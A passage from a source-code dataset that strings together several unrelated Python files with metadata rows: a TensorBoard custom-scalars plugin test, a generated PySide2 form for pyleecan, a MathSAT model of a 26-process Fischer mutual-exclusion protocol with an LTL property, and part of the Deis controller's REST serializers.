from tensorboard.plugins.custom_scalar import summary
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.scalar import summary as scalar_summary
from tensorboard.util import test_util
tf.compat.v1.disable_v2_behavior()
class CustomScalarsPluginTest(tf.test.TestCase):
def __init__(self, *args, **kwargs):
super(CustomScalarsPluginTest, self).__init__(*args, **kwargs)
self.logdir = os.path.join(self.get_temp_dir(), "logdir")
os.makedirs(self.logdir)
self.logdir_layout = layout_pb2.Layout(
category=[
layout_pb2.Category(
title="cross entropy",
chart=[
layout_pb2.Chart(
title="cross entropy",
multiline=layout_pb2.MultilineChartContent(
tag=[r"cross entropy"],
),
),
],
closed=True,
)
]
)
self.foo_layout = layout_pb2.Layout(
category=[
layout_pb2.Category(
title="mean biases",
chart=[
layout_pb2.Chart(
title="mean layer biases",
multiline=layout_pb2.MultilineChartContent(
tag=[
r"mean/layer0/biases",
r"mean/layer1/biases",
],
),
),
],
),
layout_pb2.Category(
title="std weights",
chart=[
layout_pb2.Chart(
title="stddev layer weights",
multiline=layout_pb2.MultilineChartContent(
tag=[r"stddev/layer\d+/weights"],
),
),
],
),
# A category with this name is also present in a layout for a
# different run (the logdir run) and also contains a duplicate chart
layout_pb2.Category(
title="cross entropy",
chart=[
layout_pb2.Chart(
title="cross entropy margin chart",
margin=layout_pb2.MarginChartContent(
series=[
layout_pb2.MarginChartContent.Series(
value="cross entropy",
lower="cross entropy lower",
upper="cross entropy upper",
),
],
),
),
layout_pb2.Chart(
title="cross entropy",
multiline=layout_pb2.MultilineChartContent(
tag=[r"cross entropy"],
),
),
],
),
]
)
# Generate test data.
with test_util.FileWriterCache.get(
os.path.join(self.logdir, "foo")
) as writer:
writer.add_summary(
test_util.ensure_tb_summary_proto(summary.pb(self.foo_layout))
)
for step in range(4):
writer.add_summary(
test_util.ensure_tb_summary_proto(
scalar_summary.pb("squares", step * step)
),
step,
)
with test_util.FileWriterCache.get(
os.path.join(self.logdir, "bar")
) as writer:
for step in range(3):
writer.add_summary(
test_util.ensure_tb_summary_proto(
scalar_summary.pb("increments", step + 1)
),
step,
)
# The '.' run lacks scalar data but has a layout.
with test_util.FileWriterCache.get(self.logdir) as writer:
writer.add_summary(
test_util.ensure_tb_summary_proto(
summary.pb(self.logdir_layout)
)
)
self.plugin = self.createPlugin(self.logdir)
def createPlugin(self, logdir):
multiplexer = event_multiplexer.EventMultiplexer()
multiplexer.AddRunsFromDirectory(logdir)
multiplexer.Reload()
plugin_name_to_instance = {}
context = base_plugin.TBContext(
logdir=logdir,
multiplexer=multiplexer,
plugin_name_to_instance=plugin_name_to_instance,
)
scalars_plugin_instance = scalars_plugin.ScalarsPlugin(context)
custom_scalars_plugin_instance = custom_scalars_plugin.CustomScalarsPlugin(
context
)
plugin_instances = [
scalars_plugin_instance,
custom_scalars_plugin_instance,
]
for plugin_instance in plugin_instances:
plugin_name_to_instance[
plugin_instance.plugin_name
] = plugin_instance
return custom_scalars_plugin_instance
def testDownloadData(self):
body, mime_type = self.plugin.download_data_impl(
"foo", "squares/scalar_summary", "exp_id", "json"
)
self.assertEqual("application/json", mime_type)
self.assertEqual(4, len(body))
for step, entry in enumerate(body):
# The time stamp should be reasonable.
self.assertGreater(entry[0], 0)
self.assertEqual(step, entry[1])
np.testing.assert_allclose(step * step, entry[2])
def testScalars(self):
body = self.plugin.scalars_impl("bar", "increments", "exp_id")
self.assertTrue(body["regex_valid"])
self.assertItemsEqual(
["increments/scalar_summary"], list(body["tag_to_events"].keys())
)
data = body["tag_to_events"]["increments/scalar_summary"]
for step, entry in enumerate(data):
# The time stamp should be reasonable.
self.assertGreater(entry[0], 0)
self.assertEqual(step, entry[1])
np.testing.assert_allclose(step + 1, entry[2])
def testMergedLayout(self):
parsed_layout = layout_pb2.Layout()
json_format.Parse(self.plugin.layout_impl(), parsed_layout)
correct_layout = layout_pb2.Layout(
category=[
# A category with this name is also present in a layout for a
# different run (the logdir run)
layout_pb2.Category(
title="cross entropy",
chart=[
layout_pb2.Chart(
title="cross entropy",
multiline=layout_pb2.MultilineChartContent(
tag=[r"cross entropy"],
),
),
layout_pb2.Chart(
title="cross entropy margin chart",
margin=layout_pb2.MarginChartContent(
series=[
layout_pb2.MarginChartContent.Series(
value="cross entropy",
lower="cross entropy lower",
upper="cross entropy upper",
),
],
),
),
],
closed=True,
),
layout_pb2.Category(
title="mean biases",
chart=[
layout_pb2.Chart(
title="mean layer biases",
multiline=layout_pb2.MultilineChartContent(
tag=[
r"mean/layer0/biases",
r"mean/layer1/biases",
],
),
),
],
),
layout_pb2.Category(
title="std weights",
chart=[
layout_pb2.Chart(
title="stddev layer weights",
multiline=layout_pb2.MultilineChartContent(
tag=[r"stddev/layer\d+/weights"],
),
),
],
),
]
)
self.assertProtoEquals(correct_layout, parsed_layout)
def testLayoutFromSingleRun(self):
# The foo directory contains 1 single layout.
local_plugin = self.createPlugin(os.path.join(self.logdir, "foo"))
parsed_layout = layout_pb2.Layout()
json_format.Parse(local_plugin.layout_impl(), parsed_layout)
self.assertProtoEquals(self.foo_layout, parsed_layout)
def testNoLayoutFound(self):
# The bar directory contains no layout.
local_plugin = self.createPlugin(os.path.join(self.logdir, "bar"))
self.assertDictEqual({}, local_plugin.layout_impl())
def testIsActive(self):
self.assertTrue(self.plugin.is_active())
def testIsNotActiveDueToNoLayout(self):
# The bar directory contains scalar data but no layout.
local_plugin = self.createPlugin(os.path.join(self.logdir, "bar"))
self.assertFalse(local_plugin.is_active())
def testIsNotActiveDueToNoScalarsData(self):
# Generate a directory with a layout but no scalars data.
directory = os.path.join(self.logdir, "no_scalars")
with test_util.FileWriterCache.get(directory) as writer:
writer.add_summary(
test_util.ensure_tb_summary_proto(
summary.pb(self.logdir_layout)
)
)
local_plugin = self.createPlugin(directory)
self.assertFalse(local_plugin.is_active())
if __name__ == "__main__":
tf.test.main()
| 39.32 | 84 | 0.501017 |
6ba2161b9bf2487a29b44ed5ff791e6ea3de952e | 4,557 | py | Python | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | 2 | 2020-08-28T14:54:55.000Z | 2021-03-13T19:34:45.000Z | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | null | null | null | pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleMUD/Ui_PHoleMUD.py | ajpina/pyleecan | f8d1fce7d108cf443f5767e35d59ff15905fb49f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# File generated according to PHoleMUD.ui
# WARNING! All changes made in this file will be lost!
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from ......GUI.Tools.WPathSelector.WPathSelector import WPathSelector
from ......GUI.Tools.MPLCanvas import MPLCanvas2
from ......GUI.Dialog.DMatLib.WMatSelect.WMatSelect import WMatSelect
from pyleecan.GUI.Resources import pyleecan_rc
class Ui_PHoleMUD(object):
def setupUi(self, PHoleMUD):
if not PHoleMUD.objectName():
PHoleMUD.setObjectName(u"PHoleMUD")
PHoleMUD.resize(740, 440)
PHoleMUD.setMinimumSize(QSize(740, 440))
PHoleMUD.setMaximumSize(QSize(16777215, 16777215))
self.horizontalLayout = QHBoxLayout(PHoleMUD)
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.w_viewer = MPLCanvas2(PHoleMUD)
self.w_viewer.setObjectName(u"w_viewer")
self.horizontalLayout.addWidget(self.w_viewer)
self.verticalLayout_3 = QVBoxLayout()
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.w_path_json = WPathSelector(PHoleMUD)
self.w_path_json.setObjectName(u"w_path_json")
sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.w_path_json.sizePolicy().hasHeightForWidth())
self.w_path_json.setSizePolicy(sizePolicy)
self.verticalLayout_3.addWidget(self.w_path_json)
self.b_dxf = QPushButton(PHoleMUD)
self.b_dxf.setObjectName(u"b_dxf")
self.verticalLayout_3.addWidget(self.b_dxf)
self.g_mat = QGroupBox(PHoleMUD)
self.g_mat.setObjectName(u"g_mat")
self.g_mat_layout = QVBoxLayout(self.g_mat)
self.g_mat_layout.setObjectName(u"g_mat_layout")
self.w_mat_0 = WMatSelect(self.g_mat)
self.w_mat_0.setObjectName(u"w_mat_0")
self.w_mat_0.setMinimumSize(QSize(100, 0))
self.g_mat_layout.addWidget(self.w_mat_0)
self.verticalLayout_3.addWidget(self.g_mat)
self.verticalSpacer = QSpacerItem(
20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding
)
self.verticalLayout_3.addItem(self.verticalSpacer)
self.g_output = QGroupBox(PHoleMUD)
self.g_output.setObjectName(u"g_output")
self.g_output.setMinimumSize(QSize(200, 0))
self.verticalLayout = QVBoxLayout(self.g_output)
self.verticalLayout.setObjectName(u"verticalLayout")
self.out_slot_surface = QLabel(self.g_output)
self.out_slot_surface.setObjectName(u"out_slot_surface")
self.verticalLayout.addWidget(self.out_slot_surface)
self.out_magnet_surface = QLabel(self.g_output)
self.out_magnet_surface.setObjectName(u"out_magnet_surface")
self.verticalLayout.addWidget(self.out_magnet_surface)
self.out_Rmin = QLabel(self.g_output)
self.out_Rmin.setObjectName(u"out_Rmin")
self.verticalLayout.addWidget(self.out_Rmin)
self.out_Rmax = QLabel(self.g_output)
self.out_Rmax.setObjectName(u"out_Rmax")
self.verticalLayout.addWidget(self.out_Rmax)
self.verticalLayout_3.addWidget(self.g_output)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.retranslateUi(PHoleMUD)
QMetaObject.connectSlotsByName(PHoleMUD)
# setupUi
def retranslateUi(self, PHoleMUD):
PHoleMUD.setWindowTitle(QCoreApplication.translate("PHoleMUD", u"Form", None))
self.b_dxf.setText(
QCoreApplication.translate("PHoleMUD", u"Define Hole from DXF", None)
)
self.g_mat.setTitle(QCoreApplication.translate("PHoleMUD", u"Materials", None))
self.g_output.setTitle(QCoreApplication.translate("PHoleMUD", u"Output", None))
self.out_slot_surface.setText(
QCoreApplication.translate("PHoleMUD", u"Hole full surface : ?", None)
)
self.out_magnet_surface.setText(
QCoreApplication.translate("PHoleMUD", u"Hole magnet surface : ?", None)
)
self.out_Rmin.setText(QCoreApplication.translate("PHoleMUD", u"Rmin : ?", None))
self.out_Rmax.setText(QCoreApplication.translate("PHoleMUD", u"Rmax : ?", None))
# retranslateUi
| 37.975 | 88 | 0.692341 |
f5f5e6a6f7ec250d676e5fa65b38efd1b9393d1f | 14,309 | py | Python | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/ltl_timed_transition_system/dynamic_fischer/f3/dynamic_fischer_0026.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from collections import Iterable
from itertools import chain
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next
num_procs = 26
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
bool_type = msat_get_bool_type(menv)
num_bits = ceil(log(enum_size, 2))
b_vars = []
for idx in range(num_bits):
c_name = "{}{}".format(v_name, idx)
b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
vals = []
x_vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
assign = [b_vars[idx] if c == '1' else
(msat_make_not(menv, b_vars[idx][0]),
msat_make_not(menv, b_vars[idx][1]))
for idx, c in enumerate(reversed(bit_val))]
pred = assign[0][0]
x_pred = assign[0][1]
for it in assign[1:]:
pred = msat_make_and(menv, pred, it[0])
x_pred = msat_make_and(menv, x_pred, it[1])
vals.append(pred)
x_vals.append(x_pred)
assert len(vals) == enum_size
assert len(x_vals) == enum_size
return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
m_one = msat_make_number(menv, "-1")
arg1 = msat_make_times(menv, arg1, m_one)
return msat_make_plus(menv, arg0, arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
real_type = msat_get_rational_type(menv)
delta = msat_declare_function(menv, delta_name, real_type)
delta = msat_make_constant(menv, delta)
return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
msat_term, msat_term):
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
id_symbs, ids, x_ids = make_enum(menv, "id", num_procs + 1)
turn_symbs, turns, x_turns = make_enum(menv, "turn", num_procs)
proposed = [tuple(decl_consts(menv, "proposed{}".format(i), real_type))
for i in range(num_procs)]
x_proposed = [p[1] for p in proposed]
proposed = [p[0] for p in proposed]
max_prop, x_max_prop = decl_consts(menv, "max_prop", real_type)
delta, x_delta = decl_consts(menv, delta_name, real_type)
inc_max_prop, x_inc_max_prop = decl_consts(menv, "inc_max_prop", bool_type)
same_id = msat_make_iff(menv, id_symbs[0][1], id_symbs[0][0])
for s, x_s in id_symbs[1:]:
same_id = msat_make_and(menv, same_id,
msat_make_iff(menv, x_s, s))
same_turn = msat_make_iff(menv, turn_symbs[0][1], turn_symbs[0][0])
for s, x_s in turn_symbs[1:]:
same_turn = msat_make_and(menv, same_turn,
msat_make_iff(menv, x_s, s))
procs = [Proc("p{}".format(i), menv, enc, turns[i],
ids[i], x_ids[i], ids[-1], x_ids[-1],
proposed[i], x_proposed[i],
same_id, max_prop, delta, x_delta)
for i in range(num_procs)]
curr2next = {max_prop: x_max_prop, delta: x_delta,
inc_max_prop: x_inc_max_prop}
for s, x_s in chain(id_symbs, turn_symbs):
assert s not in curr2next
curr2next[s] = x_s
for s, x_s in zip(proposed, x_proposed):
assert s not in curr2next
curr2next[s] = x_s
for comp in procs:
for s, x_s in comp.symb2next.items():
curr2next[s] = x_s
# bound id
bound_id = ids[0]
for c_id in ids[1:]:
bound_id = msat_make_or(menv, bound_id, c_id)
init = bound_id
bound_id = x_ids[0]
for x_id in x_ids[1:]:
bound_id = msat_make_or(menv, bound_id, x_id)
trans = bound_id
# bound turn
bound_turn = turns[0]
for c_t in turns[1:]:
bound_turn = msat_make_or(menv, bound_turn, c_t)
init = msat_make_and(menv, init, bound_turn)
bound_turn = x_turns[0]
for x_t in x_turns[1:]:
bound_turn = msat_make_or(menv, bound_turn, x_t)
trans = msat_make_and(menv, trans, bound_turn)
# id = 0 & inc_max_prop
init = msat_make_and(menv, init, msat_make_and(menv, ids[0], inc_max_prop))
zero = msat_make_number(menv, "0")
# delta > 0 -> id' = id & turn' = turn &
# max_prop' = max_prop
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv, msat_make_and(menv, same_id, same_turn),
x_inc_max_prop)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, lhs, rhs))
# invar: delta >= 0
init = msat_make_and(menv, init, msat_make_geq(menv, delta, zero))
trans = msat_make_and(menv, trans, msat_make_geq(menv, x_delta, zero))
# invar: max_prop >= proposed[0] & ...
for prop, x_prop in zip(proposed, x_proposed):
init = msat_make_and(menv, init,
msat_make_geq(menv, max_prop, prop))
trans = msat_make_and(menv, trans,
msat_make_geq(menv, x_max_prop, x_prop))
# invar: max_prop = proposed[0] | ...
init_eqs = msat_make_equal(menv, max_prop, proposed[0])
trans_eqs = msat_make_equal(menv, x_max_prop, x_proposed[0])
for p, x_p in zip(proposed[1:], x_proposed[1:]):
init_eqs = msat_make_or(menv, init_eqs,
msat_make_equal(menv, max_prop, p))
trans_eqs = msat_make_or(menv, trans_eqs,
msat_make_equal(menv, x_max_prop, x_p))
init = msat_make_and(menv, init, init_eqs)
trans = msat_make_and(menv, trans, trans_eqs)
# max_prop' >= max_prop <-> inc_max_prop'
lhs = msat_make_geq(menv, x_max_prop, max_prop)
rhs = x_inc_max_prop
trans = msat_make_and(menv, trans,
msat_make_iff(menv, lhs, rhs))
for p in procs:
init = msat_make_and(menv, init, p.init)
trans = msat_make_and(menv, trans, p.trans)
# F G inc_max_prop
ltl = enc.make_F(enc.make_G(inc_max_prop))
return TermMap(curr2next), init, trans, ltl
class Module:
"""Synchronous component"""
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
*args, **kwargs):
self.name = name
self.menv = menv
self.enc = enc
self.symb2next = {}
true = msat_make_true(menv)
self.init = true
self.trans = true
def _symb(self, v_name, v_type):
v_name = "{}_{}".format(self.name, v_name)
return decl_consts(self.menv, v_name, v_type)
def _enum(self, v_name: str, enum_size: int):
c_name = "{}_{}".format(self.name, v_name)
return make_enum(self.menv, c_name, enum_size)
class Proc(Module):
"""P module"""
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
run, mid, x_mid, id0, x_id0,
prop, x_prop, same_id, max_prop,
delta, x_delta):
super().__init__(name, menv, enc)
real_type = msat_get_rational_type(menv)
loc_symbs, locs, x_locs = self._enum("l", 4)
x, x_x = self._symb("x", real_type)
saved, x_saved = self._symb("saved_max", real_type)
idle = locs[0]
wait = locs[1]
req = locs[2]
cs = locs[3]
x_idle = x_locs[0]
x_wait = x_locs[1]
x_req = x_locs[2]
x_cs = x_locs[3]
self.symb2next = {x: x_x, saved: x_saved}
for s, x_s in loc_symbs:
assert s not in self.symb2next
self.symb2next[s] = x_s
same_loc = msat_make_iff(menv, loc_symbs[0][1], loc_symbs[0][0])
for s, x_s in loc_symbs[1:]:
same_loc = msat_make_and(menv, same_loc,
msat_make_iff(menv, x_s, s))
# bound loc
self.init = msat_make_or(menv,
msat_make_or(menv, idle, wait),
msat_make_or(menv, req, cs))
self.trans = msat_make_or(menv,
msat_make_or(menv, x_idle, x_wait),
msat_make_or(menv, x_req, x_cs))
zero = msat_make_number(menv, "0")
# idle & x = 0 & saved_max = max_prop
self.init = msat_make_and(
menv,
msat_make_and(menv, self.init, idle),
msat_make_and(menv,
msat_make_equal(menv, x, zero),
msat_make_equal(menv, saved, max_prop)))
# invar: prop > 0
self.init = msat_make_and(menv, self.init,
msat_make_gt(menv, prop, zero))
self.trans = msat_make_and(menv, self.trans,
msat_make_gt(menv, x_prop, zero))
# invar: (location = req) -> x <= prop
self.init = msat_make_and(
menv, self.init,
msat_make_impl(menv, req, msat_make_leq(menv, x, prop)))
self.trans = msat_make_and(
menv, self.trans,
msat_make_impl(menv, x_req, msat_make_leq(menv, x_x, x_prop)))
# (delta > 0 | !run) -> loc' = loc & x' = x + delta &
# saved_max' = saved_max & prop' = prop
lhs = msat_make_or(menv,
msat_make_gt(menv, delta, zero),
msat_make_not(menv, run))
rhs = msat_make_and(
menv,
msat_make_and(menv, same_loc,
msat_make_equal(menv, x_x,
msat_make_plus(menv, x, delta))),
msat_make_and(menv,
msat_make_equal(menv, x_saved, saved),
msat_make_equal(menv, x_prop, prop)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
disc_t = msat_make_and(menv, run, msat_make_equal(menv, delta, zero))
# loc = idle -> (loc' = req & x' = 0 & id' = id &
# prop' = prop & saved_max' = max_prop)
lhs = msat_make_and(menv, disc_t, idle)
rhs = msat_make_and(menv,
msat_make_and(menv, x_req,
msat_make_equal(menv, x_x, zero)),
msat_make_and(menv, same_id,
msat_make_equal(menv, x_prop, prop)))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_saved, max_prop))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# loc = req -> (loc' = wait & x' = 0 & id' = pid & prop' = prop &
# saved_max' = max_prop)
lhs = msat_make_and(menv, disc_t, req)
rhs = msat_make_and(menv,
msat_make_and(menv, x_wait,
msat_make_equal(menv, x_x, zero)),
msat_make_and(menv, x_mid,
msat_make_equal(menv, x_prop, prop)))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_saved, max_prop))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# loc = wait -> (id' = id & prop' = prop & saved' = max_prop &
# (loc' = idle & x' = 0) | (loc' = cs & x' = x))
disj = msat_make_or(menv,
msat_make_and(menv, x_idle,
msat_make_equal(menv, x_x, zero)),
msat_make_and(menv, x_cs,
msat_make_equal(menv, x_x, x)))
lhs = msat_make_and(menv, disc_t, wait)
rhs = msat_make_and(
menv,
msat_make_and(menv, same_id,
msat_make_equal(menv, x_prop, prop)),
msat_make_and(menv,
msat_make_equal(menv, x_saved, max_prop),
disj))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# loc = cs -> (loc' = idle & x' = x & id' = 0 & prop' < prop &
# saved_max' = max_prop)
lhs = msat_make_and(menv, disc_t, cs)
rhs = msat_make_and(menv,
msat_make_and(menv, x_idle,
msat_make_equal(menv, x_x, x)),
msat_make_and(menv, x_id0,
msat_make_lt(menv, x_prop, prop)))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_saved, max_prop))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
| 40.535411 | 79 | 0.566077 |
683b63fe56064ede009369a9af5296ad1f5f1798 | 13,331 | py | Python | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | 1 | 2019-11-18T19:56:21.000Z | 2019-11-18T19:56:21.000Z | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | null | null | null | controller/api/serializers.py | rochacon/deis | 6839b592a1ff9c468a8c91f5f2b6817aebd5ae86 | [
"Apache-2.0"
] | null | null | null | """
Classes to serialize the RESTful representation of Deis API models.
"""
from __future__ import unicode_literals
import json
import re
from django.conf import settings
from django.contrib.auth.models import User
from django.utils import timezone
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from api import models
PROCTYPE_MATCH = re.compile(r'^(?P<type>[a-z]+)')
MEMLIMIT_MATCH = re.compile(r'^(?P<mem>[0-9]+(MB|KB|GB|[BKMG]))$', re.IGNORECASE)
CPUSHARE_MATCH = re.compile(r'^(?P<cpu>[0-9]+)$')
TAGKEY_MATCH = re.compile(r'^[a-z]+$')
TAGVAL_MATCH = re.compile(r'^\w+$')
class JSONFieldSerializer(serializers.Field):
"""
A Django REST framework serializer for JSON data.
"""
def to_representation(self, obj):
"""Serialize the field's JSON data, for read operations."""
return obj
def to_internal_value(self, data):
"""Deserialize the field's JSON data, for write operations."""
try:
val = json.loads(data)
except TypeError:
val = data
return val
class JSONIntFieldSerializer(JSONFieldSerializer):
"""
A JSON serializer that coerces its data to integers.
"""
def to_internal_value(self, data):
"""Deserialize the field's JSON integer data."""
field = super(JSONIntFieldSerializer, self).to_internal_value(data)
for k, v in field.viewitems():
if v is not None: # NoneType is used to unset a value
try:
field[k] = int(v)
except ValueError:
field[k] = v
# Do nothing, the validator will catch this later
return field
class JSONStringFieldSerializer(JSONFieldSerializer):
"""
A JSON serializer that coerces its data to strings.
"""
def to_internal_value(self, data):
"""Deserialize the field's JSON string data."""
field = super(JSONStringFieldSerializer, self).to_internal_value(data)
for k, v in field.viewitems():
if v is not None: # NoneType is used to unset a value
field[k] = unicode(v)
return field
class ModelSerializer(serializers.ModelSerializer):
uuid = serializers.ReadOnlyField()
def get_validators(self):
"""
Hack to remove DRF's UniqueTogetherValidator when it concerns the UUID.
See https://github.com/deis/deis/pull/2898#discussion_r23105147
"""
validators = super(ModelSerializer, self).get_validators()
for v in validators:
if isinstance(v, UniqueTogetherValidator) and 'uuid' in v.fields:
validators.remove(v)
return validators
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ['email', 'username', 'password', 'first_name', 'last_name', 'is_superuser',
'is_staff', 'groups', 'user_permissions', 'last_login', 'date_joined',
'is_active']
read_only_fields = ['is_superuser', 'is_staff', 'groups',
'user_permissions', 'last_login', 'date_joined', 'is_active']
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
now = timezone.now()
user = User(
email=validated_data.get('email'),
username=validated_data.get('username'),
last_login=now,
date_joined=now,
is_active=True
)
if validated_data.get('first_name'):
user.first_name = validated_data['first_name']
if validated_data.get('last_name'):
user.last_name = validated_data['last_name']
user.set_password(validated_data['password'])
# Make the first signup an admin / superuser
if not User.objects.filter(is_superuser=True).exists():
user.is_superuser = user.is_staff = True
user.save()
return user
class AdminUserSerializer(serializers.ModelSerializer):
"""Serialize admin status for a User model."""
class Meta:
model = User
fields = ['username', 'is_superuser']
read_only_fields = ['username']
class AppSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.App` model."""
owner = serializers.ReadOnlyField(source='owner.username')
structure = JSONFieldSerializer(required=False)
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a :class:`AppSerializer`."""
model = models.App
fields = ['uuid', 'id', 'owner', 'url', 'structure', 'created', 'updated']
read_only_fields = ['uuid']
class BuildSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Build` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
procfile = JSONFieldSerializer(required=False)
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a :class:`BuildSerializer`."""
model = models.Build
fields = ['owner', 'app', 'image', 'sha', 'procfile', 'dockerfile', 'created',
'updated', 'uuid']
read_only_fields = ['uuid']
class ConfigSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Config` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
values = JSONStringFieldSerializer(required=False)
memory = JSONStringFieldSerializer(required=False)
cpu = JSONIntFieldSerializer(required=False)
tags = JSONStringFieldSerializer(required=False)
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
"""Metadata options for a :class:`ConfigSerializer`."""
model = models.Config
def validate_memory(self, value):
for k, v in value.viewitems():
if v is None: # use NoneType to unset a value
continue
if not re.match(PROCTYPE_MATCH, k):
raise serializers.ValidationError("Process types can only contain [a-z]")
if not re.match(MEMLIMIT_MATCH, str(v)):
raise serializers.ValidationError(
"Limit format: <number><unit>, where unit = B, K, M or G")
return value
def validate_cpu(self, value):
for k, v in value.viewitems():
if v is None: # use NoneType to unset a value
continue
if not re.match(PROCTYPE_MATCH, k):
raise serializers.ValidationError("Process types can only contain [a-z]")
shares = re.match(CPUSHARE_MATCH, str(v))
if not shares:
raise serializers.ValidationError("CPU shares must be an integer")
for v in shares.groupdict().viewvalues():
try:
i = int(v)
except ValueError:
raise serializers.ValidationError("CPU shares must be an integer")
if i > 1024 or i < 0:
raise serializers.ValidationError("CPU shares must be between 0 and 1024")
return value
def validate_tags(self, value):
for k, v in value.viewitems():
if v is None: # use NoneType to unset a value
continue
if not re.match(TAGKEY_MATCH, k):
raise serializers.ValidationError("Tag keys can only contain [a-z]")
if not re.match(TAGVAL_MATCH, str(v)):
raise serializers.ValidationError("Invalid tag value")
return value
class ReleaseSerializer(ModelSerializer):
"""Serialize a :class:`~api.models.Release` model."""
app = serializers.SlugRelatedField(slug_field='id', queryset=models.App.objects.all())
owner = serializers.ReadOnlyField(source='owner.username')
created = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
updated = serializers.DateTimeField(format=settings.DEIS_DATETIME_FORMAT, read_only=True)
class Meta:
